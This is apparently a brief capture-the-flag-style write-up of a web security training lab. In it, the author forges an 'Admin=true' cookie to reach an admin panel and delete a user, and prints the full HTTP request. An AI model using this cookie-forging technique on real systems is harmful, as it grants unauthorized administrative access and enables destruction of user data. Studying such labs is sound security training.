User role controlled by request parameter

This lab has an admin panel at /admin, which identifies administrators using a forgeable cookie.

After logging in as "wiener," I attempted to access the admin panel at "/admin." Upon inspecting the request using Burp Suite, I observed that it was setting an "Admin" cookie to false. To gain access to the admin functionalities, I simply manipulated the cookie, setting it to true. This adjustment allowed me to proceed through the entire process, ultimately leading to the deletion of the "carlos" user and successful completion of the lab.

GET /admin/delete?username=carlos HTTP/2
Host: 0a79000903e5ceb781eb3e120067003f.web-security-academy.net
Cookie: Admin=true; session=nAeBiUvq3S5T5I9eu6wJKNj5WLoVNaZX
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a79000903e5ceb781eb3e120067003f.web-security-academy.net/admin
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i

PreviousUnprotected admin functionality with unpredictable URL NextUser role can be modified in user profile

Last updated 1 year ago